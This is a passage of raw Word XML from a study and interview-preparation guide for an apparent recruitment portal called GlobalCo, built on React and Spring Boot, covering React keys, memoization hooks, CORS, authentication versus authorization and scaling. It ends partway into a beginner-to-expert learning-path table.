        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, all card lists (JobCard in JobSearchPage, candidate cards in ApplicantTrackingPage) explicitly use unique database IDs as keys (e.g., key={job.id}), never array indexes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Why should you never use the array index as a key if the list can be reordered or filtered?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Because if items are reordered or deleted, the index stays the same for different items, causing React to associate old DOM state or input values with the wrong items, leading to UI bugs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What is the difference between useMemo and useCallback in React?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>useMemo caches the RESULT of a function calculation between renders, while useCallback caches the FUNCTION INSTANCE itself between renders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Every time a component re-renders, all functions declared inside it are recreated in memory. Passing an inline function to a memoized child component causes the child to re-render because the function reference is different. useCallback memoizes the function reference, recreating it only when specified dependencies change. useMemo evaluates a calculation and stores the return value, skipping recalculation on subsequent renders if dependencies remain unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, in JobSearchPage, the complex multi-parameter filter calculation across 500+ job requisitions is wrapped in useMemo, ensuring filtering only re-evaluates when the search keyword or filter pills actually change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Can overusing useMemo and useCallback hurt performance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Yes. Both hooks introduce memory overhead and dependency array comparison costs on every render. If used for trivial calculations (like adding two numbers), the optimization costs more CPU than simply letting React run the code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What is CORS, and why did you configure it in Spring Security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Cross-Origin Resource Sharing (CORS) is a browser security mechanism that restricts web applications running on one domain/port from making HTTP requests to a different domain/port.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Under the Same-Origin Policy, browsers block JavaScript from reading HTTP responses from a different origin (protocol, domain, or port). Because our React frontend executes on http://localhost:5173 and our Spring Boot backend runs on http://localhost:8080, they are considered different origins. When the frontend makes a request, the browser first sends an HTTP OPTIONS 'preflight' request asking if the origin is permitted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo's SecurityConfig.java, we registered a CorsConfigurationSource allowing origins 'http://localhost:5173', verbs 'GET, POST, PUT, DELETE, OPTIONS', and headers 'Authorization, Content-Type', enabling smooth cross-origin communication without security holes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Why doesn't Postman or curl experience CORS errors?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Because CORS is enforced strictly by web browsers, not servers. CLI tools and backend clients do not implement browser Same-Origin Policies and ignore CORS response headers entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What is the difference between Authentication and Authorization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Authentication is the process of verifying WHO a user is (identity); Authorization is the process of determining WHAT an authenticated user is permitted to do (permissions/roles).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Authentication answers: 'Is this user really riya.backend?' by validating credentials (passwords, JWT signatures, biometric data). Authorization answers: 'Is riya.backend allowed to delete this job requisition?' by checking their assigned roles and permissions (ROLE_CANDIDATE vs ROLE_RECRUITER).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, authentication is handled by AuthService and JwtAuthenticationFilter, while authorization is enforced by SecurityConfig route matchers (e.g., .requestMatchers('/api/recruiter/**').hasRole('RECRUITER')) and method-level @PreAuthorize annotations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Which HTTP status codes correspond to Authentication failure vs Authorization failure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Authentication failure returns HTTP 401 Unauthorized (unauthenticated or invalid token); Authorization failure returns HTTP 403 Forbidden (authenticated user lacks required role).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: How would you scale GlobalCo to handle 1,000,000 active users?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Scale the system by decoupling state, introducing distributed caching, read-write database replicas, asynchronous message streaming, and horizontal container autoscaling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. Stateless Application Tier: Package the Spring Boot backend in Docker containers deployed on AWS EKS (Kubernetes) with Horizontal Pod Autoscaling (HPA) behind an Application Load Balancer.</w:t>
        <w:br/>
        <w:t>2. Distributed In-Memory Caching: Deploy a Redis cluster using the Cache-Aside pattern for read-heavy operations like GET /api/jobs and taxonomy lookups, reducing database reads by up to 90%.</w:t>
        <w:br/>
        <w:t>3. Database Scaling: Migrate H2 to Amazon Aurora MySQL with a multi-AZ primary writer and 5 read replicas. Direct write traffic to primary and read traffic to replicas.</w:t>
        <w:br/>
        <w:t>4. Asynchronous Processing: Introduce Apache Kafka to queue high-volume events (applications, notification emails, resume parsing) for background worker consumption.</w:t>
        <w:br/>
        <w:t>5. Static Asset CDN: Serve the React production bundle (HTML, CSS, JS) via Amazon CloudFront CDN edge locations, achieving sub-50ms page loads globally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GlobalCo's decoupled 3-tier architecture with stateless JWT security was intentionally designed so that no server-side HTTP sessions exist, making horizontal auto-scaling seamless without session migration complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>What is the single biggest bottleneck in a high-traffic system like this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The relational database. While application servers scale horizontally with ease, relational databases are constrained by disk I/O, locks, and connection limits, which is why caching and read replicas are essential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>35. Beginner-to-Expert Learning Path (Levels 1 to 12)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>If you are reviewing this project with zero prior knowledge, follow this structured 12-level progression. Each level defines what to learn, which files to inspect, and self-check questions to validate your understanding:</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2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Key Files to Inspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Core Engineering Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Self-Check Validation Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 1: Problem Space</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>README.md, doc_assets/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Understand why recruitment portals exist: connecting Enterprise Employers, Jobs, Candidates, and Applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Can you explain the 'application black hole' and how GlobalCo solves it?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 2: Target Users &amp; Roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SecurityConfig.java, users table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Learn the 3 distinct roles: Candidates (seekers), Recruiters (talent acquisition), and Admins (governance).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What are the exact GrantedAuthority strings used in Spring Security?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 3: Core Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobCard.jsx, ApplicantTrackingPage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Understand the primary workflows: Job Search, Skill Match Scoring, 1-Click Apply, ATS Pipeline, and Offers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What are the 7 stages of the recruitment ATS pipeline?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level 4: Architecture Overview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pom.xml, package.json, vite.config.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Understand the 3-Tier Layered Architecture: React SPA -&gt; Spring Boot REST API -&gt; H2 Relational Database.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
